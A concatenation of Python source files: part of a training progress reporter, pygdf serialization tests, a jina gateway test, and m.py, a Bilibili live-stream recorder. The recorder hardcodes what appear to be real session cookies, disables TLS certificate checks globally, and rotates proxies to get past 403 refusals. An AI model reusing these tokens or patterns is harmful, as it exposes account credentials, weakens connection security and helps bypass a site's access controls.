info_dict = {"epoch": current_epoch + 1, "iter": current_iter + 1,
"position": updated_iters, "lr": "{0:.8f}".format(current_lr)}
info_dict.update(snapshot)
self.record(info_dict, training_point)
except BaseException as e:
self.bar.finish()
if not isinstance(e, KeyboardInterrupt):
traceback.print_exc()
sys.exit(1)
def update(self, snapshot: dict):
# One update calling and one using of self.trainer.training_point and current_lr.
# training_point is updated on line 265 in trainer.py
current_lr = self.optimizer.state_dict()['param_groups'][0]['lr']
self.queue.put((snapshot, self.trainer.training_point, current_lr))
def finish(self):
self.queue.put(None)
# Wait process completed.
self.process.join()
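# A hedged sketch of how a trainer is expected to drive Reporter, based only on the
# methods above:
#
#   reporter = Reporter(trainer)
#   for each training step:
#       reporter.update(snapshot)   # snapshot: dict of metrics including a "real" sub-dict
#   reporter.finish()               # flush the queue and join the progress process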
class LRFinderReporter():
def __init__(self, max_value, log_dir=None, comment=None):
if log_dir is not None:
assert isinstance(log_dir, str)
from tensorboardX import SummaryWriter
            # Tag the output directory with a timestamp so repeated runs do not overwrite each other.
            time_string = time.strftime('%Y-%m-%d-%H-%M-%S', time.localtime(time.time()))
            if comment is None:
                comment = ""
            else:
                comment = comment + "-"
            self.board_writer = SummaryWriter("{}/{}{}-lr-finder-tensorboard".format(log_dir, comment, time_string))
else:
self.board_writer = None
widgets = [progressbar.Percentage(format='%(percentage)3.2f%%'), " | ", "Iter:",
progressbar.Variable('current_iter', format='{formatted_value}', width=0, precision=0), "/{0}".format(max_value), ", ",
progressbar.Variable('snapshot', format='{formatted_value}', width=8, precision=0),
" (", progressbar.Timer(format='ELA: %(elapsed)s'), ", ", progressbar.AdaptiveETA(), ")"]
self.bar = progressbar.ProgressBar(max_value=max_value, widgets=widgets, redirect_stdout=True)
# Use multi-process for update.
self.queue = Queue()
self.process = Process(target=self._update, daemon=True)
self.process.start()
def _update(self):
while True:
try:
res = self.queue.get()
if res is None: break
update_iters, snapshot = res
self.bar.update(update_iters, current_iter=update_iters, snapshot=utils.dict_to_params_str(snapshot, auto=False, sep=", "))
if self.board_writer is not None:
self.board_writer.add_scalars("lr_finder_scalar_group", snapshot, update_iters)
except BaseException as e:
self.bar.finish()
if not isinstance(e, KeyboardInterrupt):
traceback.print_exc()
sys.exit(1)
def update(self, update_iters: int, snapshot: dict):
self.queue.put((update_iters, snapshot))
def finish(self):
self.queue.put(None)
self.bar.finish()
|
test_serialize.py
|
# Copyright (c) 2018, NVIDIA CORPORATION.
import sys
import multiprocessing as mp
import numpy as np
import pandas as pd
from numba import cuda
try:
from distributed.protocol import serialize, deserialize
_have_distributed = True
except ImportError:
_have_distributed = False
import pytest
import pygdf
from . import utils
require_distributed = pytest.mark.skipif(not _have_distributed,
reason='no distributed')
support_ipc = sys.platform.startswith('linux') and hasattr(mp, 'get_context')
require_ipc = pytest.mark.skipif(
    not support_ipc,
    reason='only runs on linux and when multiprocessing has .get_context',
)
@require_distributed
def test_serialize_dataframe():
df = pygdf.DataFrame()
df['a'] = np.arange(100)
df['b'] = np.arange(100, dtype=np.float32)
df['c'] = pd.Categorical(['a', 'b', 'c', '_', '_'] * 20,
categories=['a', 'b', 'c'])
outdf = deserialize(*serialize(df))
pd.util.testing.assert_frame_equal(df.to_pandas(), outdf.to_pandas())
@require_distributed
def test_serialize_dataframe_with_index():
df = pygdf.DataFrame()
df['a'] = np.arange(100)
df['b'] = np.random.random(100)
df['c'] = pd.Categorical(['a', 'b', 'c', '_', '_'] * 20,
categories=['a', 'b', 'c'])
df = df.sort_values('b')
outdf = deserialize(*serialize(df))
pd.util.testing.assert_frame_equal(df.to_pandas(), outdf.to_pandas())
@require_distributed
def test_serialize_series():
sr = pygdf.Series(np.arange(100))
outsr = deserialize(*serialize(sr))
pd.util.testing.assert_series_equal(sr.to_pandas(), outsr.to_pandas())
@require_distributed
def test_serialize_range_index():
index = pygdf.index.RangeIndex(10, 20)
outindex = deserialize(*serialize(index))
assert index == outindex
@require_distributed
def test_serialize_generic_index():
index = pygdf.index.GenericIndex(pygdf.Series(np.arange(10)))
outindex = deserialize(*serialize(index))
assert index == outindex
@require_distributed
def test_serialize_masked_series():
nelem = 50
data = np.random.random(nelem)
mask = utils.random_bitmask(nelem)
bitmask = utils.expand_bits_to_bytes(mask)[:nelem]
null_count = utils.count_zero(bitmask)
assert null_count >= 0
sr = pygdf.Series.from_masked_array(data, mask, null_count=null_count)
outsr = deserialize(*serialize(sr))
pd.util.testing.assert_series_equal(sr.to_pandas(), outsr.to_pandas())
@require_distributed
def test_serialize_groupby():
df = pygdf.DataFrame()
df['key'] = np.random.randint(0, 20, 100)
df['val'] = np.arange(100, dtype=np.float32)
gb = df.groupby('key')
outgb = deserialize(*serialize(gb))
got = gb.mean()
expect = outgb.mean()
pd.util.testing.assert_frame_equal(got.to_pandas(), expect.to_pandas())
@require_distributed
@require_ipc
def test_serialize_ipc():
sr = pygdf.Series(np.arange(10))
# Non-IPC
header, frames = serialize(sr)
assert header['column']['data_buffer']['kind'] == 'normal'
# IPC
hostport = 'tcp://0.0.0.0:8888'
fake_context = {
'recipient': hostport,
'sender': hostport,
}
assert sr._column.data._cached_ipch is None
header, frames = serialize(sr, context=fake_context)
assert header['column']['data_buffer']['kind'] == 'ipc'
# Check that _cached_ipch is set on the buffer
assert isinstance(sr._column.data._cached_ipch,
cuda.cudadrv.devicearray.IpcArrayHandle)
# Spawn a new process to test the IPC handle deserialization
mpctx = mp.get_context('spawn')
result_queue = mpctx.Queue()
proc = mpctx.Process(target=_load_ipc, args=(header, frames, result_queue))
proc.start()
out = result_queue.get()
proc.join(3)
# Verify that the output array matches the source
np.testing.assert_array_equal(out.to_array(), sr.to_array())
def _load_ipc(header, frames, result_queue):
try:
out = deserialize(header, frames)
result_queue.put(out)
except Exception as e:
result_queue.put(e)
@require_distributed
def test_serialize_datetime():
# Make frame with datetime column
df = pd.DataFrame({'x': np.random.randint(0, 5, size=20),
'y': np.random.normal(size=20)})
ts = np.arange(0, len(df), dtype=np.dtype('datetime64[ms]'))
df['timestamp'] = ts
gdf = pygdf.DataFrame.from_pandas(df)
# (De)serialize roundtrip
recreated = deserialize(*serialize(gdf))
# Check
pd.util.testing.assert_frame_equal(recreated.to_pandas(), df)
|
test_remote.py
|
import threading
import time
import unittest
from jina.logging import get_logger
from jina.main.parser import set_gateway_parser, set_pea_parser
from jina.peapods.pod import GatewayPod
from jina.peapods.remote import PeaSpawnHelper
from tests import JinaTestCase
class MyTestCase(JinaTestCase):
def test_logging_thread(self):
_event = threading.Event()
logger = get_logger('mytest', event_trigger=_event)
def _print_messages():
while True:
_event.wait()
print(f'thread: {_event.record}')
print(type(_event.record))
_event.clear()
t = threading.Thread(target=_print_messages)
t.daemon = True
t.start()
logger.info('blah, blah')
logger.info('blah, blah, blah')
time.sleep(.1)
logger.warning('warn, warn, warn')
time.sleep(.1)
logger.debug('warn, warn, warn')
time.sleep(.1)
logger.success('crit')
time.sleep(.1)
def tearDown(self) -> None:
time.sleep(2)
super().tearDown()
def test_remote_not_allowed(self):
f_args = set_gateway_parser().parse_args([])
p_args = set_pea_parser().parse_args(['--host', 'localhost', '--port-expose', str(f_args.port_expose)])
with GatewayPod(f_args):
PeaSpawnHelper(p_args).start()
def test_cont_gateway(self):
f1_args = set_gateway_parser().parse_args(['--allow-spawn'])
f2_args = set_gateway_parser().parse_args([])
with GatewayPod(f1_args):
pass
with GatewayPod(f2_args):
pass
if __name__ == '__main__':
unittest.main()
|
m.py
|
#! /usr/bin/env python3
# -*- coding: UTF-8 -*-
#import tracemalloc
#tracemalloc.start()
import os, sys,asyncio,concurrent,functools,shutil
#import uvloop
#asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
os.system('cd /root/b/d;mv *.flv /root/b/d/bu/')
from os.path import split, join, exists, abspath, isdir, expanduser
import re
#import logging
import json
import threading
import urllib.request
import urllib.error
from urllib.request import urlopen#, Request
import time
import io
import socket
socket.setdefaulttimeout(10)
import subprocess
import argparse
import http.client
import configparser,traceback
from mail import send_mail
import toml
import gc
import queue as Queue
password = input('password:')
testt = input('test?')
ROOMS = '';
USERS = '';
FILEDIR = '';
#DEBUGLEVEL = logging.INFO;
SCRIPT = '';
COMMAND = '';
INTERVAL = 5;
ipnum = 0;
recording = []
mvselect=1
cookies = {}
access_key = ''
sApi0 = 'http://space.bilibili.com/ajax/live/getLive?mid={}'
sApi1 = 'http://live.bilibili.com/api/player?id=cid:{}';
sApi2 = 'http://live.bilibili.com/live/getInfo?roomid={}'; # obsolete
sApi3 = 'http://live.bilibili.com/api/playurl?cid={}'; # obsolete
sAPI4 = 'https://api.live.bilibili.com/room/v1/Room/room_init?id={}'
sApi5 = 'http://api.live.bilibili.com/room/v1/Room/get_info?room_id={}'
sApi6 = 'http://api.live.bilibili.com/live_user/v1/UserInfo/get_anchor_in_room?roomid={}'
sApi7 = 'http://api.live.bilibili.com/api/playurl?cid={}&otype=json&quality=0&platform=web'
sApi8 = 'http://api.live.bilibili.com/room/v1/Room/playUrl?cid={}&otype=json&platform=web&qn=4'
headers={
"Connection":"close",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36",
"Accept":"*/*",
"Referer":"https://space.bilibili.com/1836737/fans/follow",
"Accept-Encoding":"gzip, deflate, br",
"Accept-Language":"zh-CN,zh;q=0.9,ja;q=0.8",
"Cookie":"buvid3=DF8F84B3-B90F-4D48-AF16-6ECF24C8BAA540777infoc; LIVE_BUVID=AUTO2015577399215380; sid=6znidvkl; DedeUserID=1836737; DedeUserID__ckMd5=326caeb00bc9daa3; SESSDATA=34f5f194%2C1560331941%2C35fcf151; bili_jct=9c0eebb9461bc14a8c855818a27b48c6; _dfcaptcha=b761810cd8d5d6835ab4d99a536ac018"
}
aRooms = [];
sHome = '';
sSelfDir = '';
sLogDir = '';
log = None;
sleepEvent = None;
wait = None;
selectip = None
vfs=os.statvfs("/root")
available=vfs.f_bavail*vfs.f_bsize/(1024*1024*1024)
import requests
import random
ii=0
import ssl
from multiprocessing import Process, Value
upwork = Value("d",0)
sys.path.append('/root/u')
#from getip import *
ssl._create_default_https_context = ssl._create_unverified_context
#logging.basicConfig(format=' %(asctime)s %(levelname)-5s: %(message)s', datefmt='%Y-%m-%d %H:%M:%S');
#log = logging.getLogger(__name__);
#log.setLevel(DEBUGLEVEL);
sleepEvent = threading.Event();
wait = sleepEvent.wait;
ss = requests.session()
ss.keep_alive = False
def delete_proxy(proxy):
with requests.get("http://127.0.0.1:5010/delete/?proxy={}".format(proxy)) as r:
print(r.text)
def get_proxy():
while True:
try:
with ss.get("http://127.0.0.1:5010/get",timeout=20) as r:
ip = r.json().get("proxy")
return ip
except:
time.sleep(0.1)
proxyg={'http':get_proxy()}#getip('国内')
streamip = []
allips = []
def prepare(room,s=None):
global sHome
global sSelfDir
global sLogDir
global log
global sleepEvent
global wait
global ii
global ipnum
'''
config = configparser.ConfigParser()
config.read(sys.path[0] + "/proxy.ini")
try:
sourceip = socket.gethostbyname(config.get('proxy','ip'))
r = requests.get('http://%s:8765/?count=1000&protocol=1' % sourceip,timeout=10)
except Exception as e:
sourceip = "127.0.0.1"
r = requests.get('http://%s:8765/?count=1000&protocol=1' % sourceip,timeout=10)
try:
ip_ports = json.loads(r.text)
except Exception as e:
print(e)
time.sleep(0.1)
prepare(room)
return
print("数量:")
print(len(ip_ports))
ipnum=int(len(ip_ports))
try:
ip = ip_ports[ii][0]
except Exception as e:
print(e)
try:
r = requests.get('http://%s:8765/?count=1000&protocol=1' % sourceip,timeout=10)
ip = ip_ports[ii][0]
except Exception as e:
ii += 1
if(ii>=ipnum):
ii=0
prepare(room)
return
port = ip_ports[ii][1]
proxies={'https':'%s:%s'%(ip,port)}
print('取用第{}个IP地址:{}\n'.format(ii+1,proxies))
ii += 1
if(ii>=ipnum):
ii=0
'''
while True:
try:
#r = ss.get('http://127.0.0.1:5010/get',timeout = 20)
room.ip=ip = get_proxy()
break
except Exception as e:
print(e)
time.sleep(1)
if s=='s':
proxies={'https':ip}
elif s =='国内':
pass#proxies=getip(s)
else:
proxies = {'http':ip}#,'https':ip}
#proxies=getip('s')
print(proxies)
proxy_support = urllib.request.ProxyHandler(proxies)
sHome = expanduser('~')
sSelfDir = split(__file__)[0];
#sLogDir = join(sSelfDir, 'multilisten.log.d');
#logging.basicConfig(format=' %(asctime)s %(levelname)-5s: %(message)s', datefmt='%Y-%m-%d %H:%M:%S');
#log = logging.getLogger(__name__);
#log.setLevel(DEBUGLEVEL);
sleepEvent = threading.Event();
wait = sleepEvent.wait;
opener = urllib.request.build_opener(proxy_support);
opener = urllib.request.build_opener()  # note: this second build_opener() call discards the proxied opener built on the previous line
opener.addheaders = [('User-agent', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36')];
#urllib.request.install_opener(opener);
room.urlopen=opener.open
socket.setdefaulttimeout(30);
#prepare();
#os.system("apt install -y yamdi ffmpeg libffi-dev libssl-dev")
def display(*args, **kargs):
try:
print(*args, **kargs);
except UnicodeEncodeError as e:
sEnc = sys.stdout.encoding;
args = (str(x).encode(sEnc, 'replace').decode(sEnc) for x in args);
print(*args, **kargs);
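# Room holds the state of one monitored live room: the short id (nRoom), the
# resolved real id (nId), host name (sUser), title (sTitle), the candidate
# stream URLs collected by getStream() (aurl/burl/curl/durl, one per CDN prefix),
# the proxy in use, and the worker threads attached to it.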
class Room():
def __init__(self, nRoom=None, nUser=None,sUser=None,sTitle=None,sUrl=None):
global log
self.nRoom = int(nRoom or 0);
self.nUser= int(nUser or 0);
self.nId = int(nRoom or 0);
self.aurl = None
self.aurlc = 0
self.sUrl = sUrl;
self.burl = None;
self.curl = None;
self.durl = None
self.sTitle = sTitle;
self.sUser = sUser;
self.sStatus = None;
self._stream = io.StringIO();
self.thread = None;
self.checkthread = None;
self.ii = 1;
self.sameid = 1;
self.ex = 0;
self.urlopen = None;
self.ip = None
self.time = 0
#print({key: value for key, value in vars(self).items() if not key.startswith('_') and value});
def getRoomByUser(self):
assert self.nUser;
try:
res0 = self.urlopen(sApi0.format(self.nUser));
sData = res0.read().decode('utf-8');
assert sData;
mData = json.loads(sData);
if (mData['status']):
self.nId = self.nRoom = int(mData['data']);
return True;
else:
display('host does not exist: ', self.nUser);
return False;
finally:
if ('res0' in locals()): res0.close();
def getRealId(self):
global log
try:
#sUrl = 'http://live.bilibili.com/{}'.format(self.nRoom);
#res = urlopen(sUrl);
#bData = res.read(5000);
#match = re.search(rb'var ROOMID = (\d+);', bData);
#if (match):
# nId = int(match.group(1));
#else:
# nId = self.nRoom;
res1 = self.urlopen(sAPI4.format(self.nRoom));
bData = res1.read();
mData = json.loads(bData.decode());
nId = mData['data']['room_id'];
except urllib.error.HTTPError as e:
if (e.code == 404):
print('room {} not exists'.format(self.nRoom));
return False
else:
delete_proxy(self.ip)
raise
else:
self.nId = nId;
return True
finally:
if ('res1' in locals()): res1.close();
def getHost(self):
if (self.sUser is None):
try:
print(self.nId,"getHost")
f11 = self.urlopen(sApi6.format(self.nId));
bData = f11.read();
mData = json.loads(bData.decode());
Username = mData['data']['info']['uname'];
rstr = r"[\/\\\:\*\?\"\<\>\|\- ]"
self.sUser = re.sub(rstr,"_",Username)
except Exception as e:
display('failed to get host name: ', e);
prepare(self)
self.getHost()
#self.sUser = '';
finally:
if ('f11' in locals()): f11.close();
rstr = r"[\/\\\:\*\?\"\<\>\|\- ]"
self.sUser = re.sub(rstr,"_",self.sUser)
def getInfo(self,g=None):
global log
global sApi5, sApi6
while True:
try:
if (self.nId is None): self.getRealId();
if not self.sTitle or g:
print(self.nId,"getInfo")
res2 = self.urlopen(sApi5.format(self.nId),timeout=10);
sRoomInfo = res2.read().decode('utf-8');
mData = json.loads(sRoomInfo);
self.sTitle = sTitle = mData['data']['title'];
self.getHost();
rstr = r"[\/\\\:\*\?\"\<\>\|\-\. ]"
self.sTitle = re.sub(rstr,"_",self.sTitle)
nStatus = 1#mData['data']['live_status'];
_status = 'on' if nStatus == 1 else 'off';
self.sStatus = _status;
except Exception as e:
print('failed to get room info: {}'.format(e));
traceback.print_exc()
prepare(self);
#raise;
else:
return _status;
finally:
if ('res2' in locals()): res2.close();
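# getStream() asks the playUrl API (sApi8) for the room's durl list through a
# randomly chosen proxy from streamip, and files each returned url into
# aurl/burl/curl/durl according to its CDN prefix (live-bvc / live-js /
# live-txy / live-ws). Proxies that work stay in streamip, failing ones are removed.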
def getStream(self):
#global sApi3
#with urlopen(sApi3.format(self.nId)) as res:
# sData = res.read().decode('utf-8');
#iMatches = re.finditer(r'<(?:b\d)?url><!\[CDATA\[(.+)\]\]><\/(?:b\d)?url>', sData);
#aMatches = list(iMatches);
#if (aMatches):
# self.aUrls = [x.group(1) for x in aMatches];
# sUrl = self.sUrl = self.aUrls[0];
# return sUrl;
#else:
# return False;
global sApi8#selectip
self.time = time.time()
trytimes = 10
if self.sUrl:
return True
else:
print(self.sUser,"no url yet, fetching one via the playUrl API")
'''
if self.nId == 151159:
proxies = None
else:
'''
def newip():
print('streamip:',len(streamip))
while not streamip:
time.sleep(1)
selectip = streamip[random.randint(0,len(streamip)-1)]
proxies={'http':selectip,'https':selectip}#getip('国内')
return selectip,proxies
#print(self.nRoom,'getStream',proxies)
while trytimes:
selectip,proxies = newip()
try:
with requests.get(sApi8.format(self.nId),timeout=5,proxies=proxies) as res:
sData=res.json()
mData = sData['data']
if not mData['accept_quality']:
raise Exception("playUrl call failed: no accept_quality")
#mData = json.loads(sData);
durl = mData['durl']
n = 0
for i in durl:
url = i['url']
if 'live-bvc' in url:
self.aurl = url
elif 'live-js' in url:
self.burl = url
elif 'live-txy' in url:
self.curl = url
elif 'live-ws' in url:
self.durl = url
n+=1
if n == len(durl):
raise Exception("live-ws")  # every returned url pointed at the live-ws CDN; treat as a failed attempt
self.ip = selectip
print(self.sUser,"got stream url")
if not selectip in streamip:
streamip.append(selectip)
print(streamip)
return 1;
#sData = res.read().decode('utf-8');
except Exception as e:
#delete_proxy(ip)
if 'ss' in locals():
ss.close()
print(self.sUser,'failed to get stream url')
if selectip in streamip:
streamip.remove(selectip)
#traceback.print_exc()
trytimes -=1
#prepare(self,'国内')
#mData = json.loads(sData);
return False
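# download() writes the stream to disk. The inner newdown() generator yields raw
# chunks, preferring burl, then curl, then aurl, then durl; a 302 updates aurl
# from the Location header, a 403 first retries through a proxy and then drops
# that url, and once a file reaches 1 GiB (room 151159 excepted) it is handed to
# upload() and a new file is started.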
def download(self, sPath, stream=sys.stdout, nVerbose=1):
sDir = expanduser(FILEDIR) or sHome;
def adaptName(sPath):
if (os.path.exists(sPath)):
sName, sExt = os.path.splitext(sPath)
i = 1;
sOutPath = '{}{}{}'.format(sName, i, sExt);
while os.path.exists(sOutPath):
i += 1;
sOutPath = '{}{}{}'.format(sName, i, sExt);
else:
sOutPath = sPath;
return sOutPath;
def newName():
sTime = time.strftime('%y%m%d_%H%M%S');
sName = '{}-{}-{}.flv'.format(sTime, self.sUser, self.sTitle);
sName = re.sub(r'[^\w_\-.()]', '_', sName);
sPath = os.path.join(sDir,sName)
return sPath
proxyg = {};
selectip = None
def newdown(proxyg = proxyg,selectip=selectip,pro = 0):  # pro: whether to go through a proxy
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36', 'Referer': 'https://live.bilibili.com/{}'.format(self.nId)}
if not proxyg and pro:
proxyg['https']=selectip
proxyg['http']=selectip
#proxyg = {'http':'34.92.99.59:3247'}
timeout = 5
hasproxy = 0
while 1:
try:
if self.burl:
if hasproxy:
proxyg = {'http':'34.92.3.74:3654'}
else:
proxyg = 0
sUrl = self.sUrl = self.burl
#self.burl = 0
elif self.curl:
if hasproxy:
proxyg = {'http':self.ip}
else:
proxyg = 0
sUrl = self.sUrl = self.curl
elif self.aurl:
if self.aurlc:
proxyg = 0
else:
proxyg = {'http':self.ip}
sUrl = self.sUrl = self.aurl
elif self.durl:
if hasproxy:
proxyg = {'http':self.ip}
else:
proxyg = 0
sUrl = self.sUrl = self.durl
else:
print(self.sUser,"no url")
yield None
if testt:
print(f'\r\033[K{sUrl}')
with requests.get(sUrl,stream = True,timeout = timeout,headers=headers,proxies=proxyg,allow_redirects = False) as r:
if r.status_code == 200:
if 'live-bvc' in sUrl and not self.aurlc:
self.aurlc = 1
continue
for chunk in r.iter_content(chunk_size=1024*8):
if chunk:
yield chunk
else:
yield None
'''
if self.burl:
self.burl = 0
elif self.aurl:
self.aurl = 0
elif self.curl and not hasproxy:
hasproxy = 1
else:
break
'''
elif r.status_code == 302:
self.aurl = r.headers.get("Location")
self.aurlc = 1
elif r.status_code == 403:
if self.burl:
if not hasproxy:
hasproxy = 1
print(self.sUser,'switching to proxy')
else:
print(self.burl,'403')
print(self.burl,' 403')
self.burl = 0
elif self.curl:
if not hasproxy:
hasproxy = 1
print(self.sUser,'switching to proxy')
else:
print(self.curl,' 403')
self.curl = 0
if self.ip in streamip:
streamip.remove(self.ip)
elif self.durl:
if not hasproxy:
hasproxy = 1
print(self.sUser,'switching to proxy')
else:
print(self.durl,' 403')
self.durl = 0
if self.ip in streamip:
streamip.remove(self.ip)
else:
break
elif r.status_code == 404:
if self.burl:
self.burl = 0  # drop the url that returned 404
break
elif self.curl:
self.curl = 0  # drop the url that returned 404
break
else:
break
else:
break
except Exception as e:
if "timed" in str(e) or "refused" in str(e):
if not hasproxy:
break#hasproxy=1
else:
break
else:
print('newdown error:',e)
traceback.print_exc()
break
if 'r' not in locals():
print('url never connected')
yield None
if r.status_code !=200:
print(sUrl,' get error',r.status_code)
yield None
sUrl = self.sUrl;
bBuffer = ''
data = ''
if True:
try:
headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0'}
raise Exception('403')  # deliberately jump to the except branch so the newdown() generator below is used
req=urllib.request.Request(sUrl,headers=headers)
r=urlopen(req)
#r = urlopen(sUrl, timeout=4)
except Exception as e:
#print(self.sUser,e,'主线中断,切换备线\n')
#aaaa=self.getStream()
#if aaaa:
# sUrl = self.ssUrl
#else:
# return False,sPath
'''
while True:
try:
r = urlopen(sUrl, timeout=20)
except Exception as e:
print(e)
if "403" in str(e):
print(self.sUser,'被拒,继续尝试')
else:
break
'''
try:
if '4' in str(e):
data = newdown()
if data:
bBuffer = data.__next__()
else:
return False,sPath
else:
r = urlopen(sUrl, timeout=5)
except Exception as e:
traceback.print_exc();
print(self.sUser,e,'失败\n')
return False,sPath
'''
sUrl = self.ssUrl
try:
r=urlopen(sUrl,timeout=5)
except Exception as e:
print(e)
return False,sPath
'''
except socket.timeout as e:
print(e)
return False,sPath
else:
pass
sPath = newName();
sPath = adaptName(sPath);
#iUrls = iter(aUrl);
#sUrl = next(iUrls);
try:
if bBuffer:
f1 = open(sPath, 'wb');
self.time = round(time.time()-self.time,2)
print('sec[{}]'.format(self.time),'{} starting download from:\n{}\n to:\n{}'.format(self.nId, self.sUrl, sPath));
if (nVerbose):
stream.write('\n');
nSize = 0;
n = 1024*1024;
readbuffer = 1024*8
limitsize = 1024*1024*1024
tnumber = 0
#vfs=os.statvfs("/root")
#available=vfs.f_bavail*vfs.f_bsize/(1024*1024*1024)
#stream.write('\r剩余空间%.2f\n' % (available))
while bBuffer:
nSize += f1.write(bBuffer);
#f1.flush()
#if (nVerbose):
#stream.write('\r{:<4.2f} MB downloaded'.format(nSize/n));
#tnumber+=1
#if (tnumber>=200):
#break
#vfs=os.statvfs("/root")
#available=vfs.f_bavail*vfs.f_bsize/(1024*1024*1024)
#stream.write('剩余空间%.2f\n' % (available))
#tnumber = 0
if (nSize >= limitsize and self.nId != 151159):
print('%s reached the size limit, archiving' % sPath)
if 'r' in locals():
print("closing previous connection")
r.close()
nSize = 0
f1.close()
upload(sPath)
'''
sTime = time.strftime('%y%m%d_%H%M%S');
sName = '{}-{}-{}.flv'.format(sTime, self.sUser, self.sTitle);
sName = re.sub(r'[^\w_\-.()]', '_', sName);
sPath = os.path.join(sDir,sName)
'''
sPath = newName()
f1 = open(sPath,'wb')
data = newdown()
#if (self.ii == 0 and available>25):
# self.ii = 1
#if (available<15 and (self.ii == 1 and self.nId !=151159)):
# self.ii = 0
# print('剩余空间不足,进行存储\n')
# stillrec = 1
# break
if data:
bBuffer = data.__next__()
else:
bBuffer = res.read(readbuffer);
trytry=0
waittime = 0.2
'''
while not bBuffer and trytry <2:
time.sleep(waittime)
try:
#res = urlopen(sUrl, timeout=25);
data=newdown()
except:
break
bBuffer = data.__next__()
#bBuffer = res.read(1024*128);
trytry+=1
waittime+=0.1
'''
#if (nVerbose):
#stream.write('\n');
except StopIteration:
print('{} stream ended'.format(self.sUser))
except socket.timeout as e:
print('{} downloading timeout'.format(self.nId));
except ConnectionResetError as e:
print('downloading reset: {}'.format(e));
except http.client.IncompleteRead as e:
print('downloading break:{}'.format(e));
except:
traceback.print_exc()
finally:
if ('res' in locals()):
res.close();
if ('r' in locals()):
r.close();
if ('f1' in locals()): f1.close();
if (os.path.isfile(sPath) and os.path.getsize(sPath) < 1024*1024):
os.remove(sPath);
return False,None;
return True,sPath;
def doCleanup(room, sPath, sScript=None, sCom=None, sLogFile=None):
# execute external script
# maybe in a new thread
global COMMAND, SCRIPT
global log
global sSelfDir
global sLogDir
sScript = (sScript or SCRIPT or '').strip();
sCom = (sCom or COMMAND or '').strip();
sLogFile = '{}.log'.format(room.nId);
if (sLogDir):
if (not exists(sLogDir)):
os.mkdir(sLogDir);
if (isdir(sLogDir)):
sLogFile = join(sLogDir, sLogFile);
else:
sLogFile = os.devnull;
else:
sLogFile = os.devnull;
try:
file = open(sLogFile, 'a');
if (sScript):
sScriptOri = sScript;
if (not exists(sScript)):
sScript = join(sSelfDir, sScriptOri);
sScript = abspath(sScript);
try:
subprocess.Popen(
[sys.executable, sScript, sPath],
stdout=file,
stderr=subprocess.STDOUT
);
except FileNotFoundError as e:
print('executing script {} failed: {}'.format(sScript, e));
else:
print(r'executing cleanup script "{}" with file "{}", logging to "{}"'
.format(sScript, sPath, sLogFile)
);
if (sCom):
sCom = sCom.format(sPath);
try:
subprocess.Popen(
sCom,
stdout=file,
stderr=subprocess.STDOUT,
shell=True
);
except FileNotFoundError as e:
print('executing command {} failed: {}'.format(sCom, e));
else:
print(r'execute cleanup command "{}", logging to "{}"'
.format(sCom, sLogFile)
);
finally:
if ('file' in locals()): file.close();
return True;
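# upload() rotates finished recordings across three local directories
# (/root/b/d/bu, /root/b/d/bu/bt, /root/b) in round-robin order, tracked by the
# global mvselect counter; the large commented-out block below is an older
# rclone-based remote upload path.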
def upload(sPath):
global mvselect
if(not os.path.exists('/root/b/d/bu')):
os.makedirs('/root/b/d/bu')
if mvselect==1:
shutil.move(sPath,'/root/b/d/bu')
mvselect+=1
elif mvselect==2:
shutil.move(sPath,'/root/b/d/bu/bt')
mvselect+=1
elif mvselect>=3:
shutil.move(sPath,'/root/b')
mvselect=1
#exit()
'''
jishu=0;
change ='waitting'+sName
cPath = os.path.join(sDir, change)
#global upwork
while upwork.value>1:
time.sleep(random.randint(0,20))
upwork.value += 1
os.system('ffmpeg -i "{}" -y -vcodec copy -acodec copy "{}"'.format(sPath,cPath))
os.system('rm -rf "{}"'.format(sPath))
os.system('yamdi -i "{}" -o "{}"'.format(cPath,sPath))
os.system('rm -rf "{}"'.format(cPath))
#upwork.value -= 1
while True:
wait(0.5);
if(not room.sUser):
room.getHost()
sPaths=re.split(r'[-]{2}',sPath)
if(len(sPaths)==2):
nPath=sPaths[0]+'-'+room.sUser+'-'+sPaths[1]
os.system('mv "{}" "{}"'.format(sPath,nPath))
sPath = nPath
os.system('rclone move "{}" milo:milo/b/"{}"'.format(sPath,room.sUser));
if(not exists(sPath)):
print('{}存储成功..'.format(sName));
if(room.ii == 0):
room.ii = 1
break;
else:
if(jishu>=10):
print('重试多次失败,请手动检查');
with open('/root/names.txt','a') as f:
f.writelines(sName);
f.write('\n')
f.close;
break;
jishu+=1;
print('存储失败,重新存储..\n')
time.sleep(5)
upwork.value -= 1
'''
def doDownload(room):
global mvselect
global FILEDIR, sHome;
global wait;
global sLogDir;
sDir = expanduser(FILEDIR) or sHome;
sTime = time.strftime('%y%m%d_%H%M%S');
sName = '{}-{}-{}.flv'.format(sTime, room.sUser, room.sTitle);
sName = re.sub(r'[^\w_\-.()]', '_', sName);
if (not exists(sDir)):
os.makedirs(sDir);
assert isdir(sDir);
sPath = os.path.join(sDir, sName);
isSuccess = room.getStream();
if (isSuccess):
isSuccess,sPath = room.download(sPath, room._stream)
if (isSuccess):
print('{} downloaded to {}'.format(room.nId, sPath));
try:
#downThread = threading.Thread(
# target=upload,
# name=str(room.nId),
# args=(room,sPath,sName,sDir,),
# daemon=True
# );
# downThread.start();
'''
p = Process(target=upload, args=(room,sPath,sName,sDir,upwork,))
print('Child process will start.')
p.start()
'''
if os.path.exists(sPath):
upload(sPath)
except Exception as e:
if (sLogDir):
if (not exists(sLogDir)):
os.mkdir(sLogDir);
if (isdir(sLogDir)):
sLogFile = 'threaderror.log'
sLogFile = join(sLogDir, sLogFile);
with open(sLogFile, 'a') as file:
file.write('\n{}:\n {}\n'.format(time.ctime(), e));
print('error "{}" is logged to file "{}"'
.format(e, sLogFile)
);
raise
#wait(2);
room._stream.seek(0);
room._stream.truncate();
print('{} download thread ended'.format(room.nId));
#os.system('rclone move {} milo:milo/b'.format(sDir));
return True;
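# checkuser() re-reads user.txt every 5 seconds, creates Room objects for ids
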